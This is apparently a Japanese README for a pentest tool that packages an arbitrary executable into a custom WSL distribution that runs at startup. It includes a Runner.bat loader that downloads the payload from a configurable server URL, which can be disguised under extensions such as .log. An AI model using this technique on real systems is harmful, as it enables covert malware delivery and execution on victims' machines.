
組み込みペイロードを備えたカスタムWSL(Windows Subsystem for Linux)ディストリビューションを作成するための強力なシェルスクリプト。
このツールは、正当なセキュリティ研究およびペネトレーションテストを目的としています。ユーザーは、自分が所有していないシステム、または明示的な許可を得ていないシステムをテストする前に、適切な許可を得ていることを確認する責任があります。
埋め込みペイロードを備えた最小限のWSL(Windows Subsystem for Linux)ディストリビューションを作成するためのシェルスクリプトです。このツールは、起動時にカスタムペイロードを実行できるAlpine LinuxベースのWSLディストリビューションを構築するプロセスを自動化します。
Build_WSL_Payload.sh スクリプトは、最新のAlpine Linux rootfsをダウンロードし、WSL用にカスタマイズし、ユーザー指定の実行可能ファイルを埋め込み、配布可能な .wsl ファイルにすべてをパッケージ化します。
Runner.bat は、指定されたURLからWSL設定ファイルをダウンロードして起動します (WSLが存在せず、管理者権限が利用可能な場合はWSLをインストールします)
これは、ペネトレーションテスト、セキュリティ研究、カスタムWSL環境の作成に特に役立ちます。
-N, --name: WSLのデフォルトのディストリビューション名を指定します-P, --payload: ペイロード実行可能ファイルへのパスを指定します-H, --help: ヘルプメニューを表示します# Build a WSL distribution named "CalcWSL" with a custom payload
./Build_WSL_Payload.sh -N CalcWSL -P ./Calc.exe
オプション1. ダブルクリック - WSLファイルをダブルクリックするとペイロードが実行されますが、手動で閉じる必要があるcmdプロンプトも開きます。(推奨されません)
オプション2. Runner.batファイルを使用
C:\Users\USER_NAME> .\Runner.bat
Runner.bat スクリプトは自動的に次のことを行います:
カスタマイズするには、Runner.bat の先頭にある変数を編集します:
set "DOWNLOAD_URL=https://your-server.com/payload.wsl"
set "WSL_FILE=payload.log" # Still testing but can use most file extensions here.
このプロジェクトは、dmcxblue/WSL-Payloads リポジトリに文書化された研究と技術に触発され、それに基づいています。このリポジトリは、WSLファイル形式の武器化とセキュリティ研究に関する貴重な洞察を提供します。
MITライセンス
ここに、次の条件に従うことを条件として、本ソフトウェアおよび関連ドキュメントファイル(以下「本ソフトウェア」)のコピーを取得するすべての人に対し、本ソフトウェアを無償で扱うことを許可します。これには、使用、複製、変更、結合、公開、配布、サブライセンス、および/または本ソフトウェアのコピーの販売の権利、および本ソフトウェアを提供された人にこれらの行為を許可する権利が、制限なく含まれます。
上記の著作権表示およびこの許可表示は、本ソフトウェアのすべてのコピーまたは重要な部分に含まれるものとします。
本ソフトウェアは「現状のまま」で提供され、明示的か黙示的かを問わず、商品性、特定目的への適合性、および非侵害の保証を含むがこれらに限定されない、いかなる保証もありません。いかなる場合も、著作者または著作権保持者は、契約行為、不法行為、またはその他の原因によるかどうかを問わず、本ソフトウェアまたは本ソフトウェアの使用またはその他の取引に起因または関連して生じるいかなる請求、損害、その他の責任についても責任を負いません。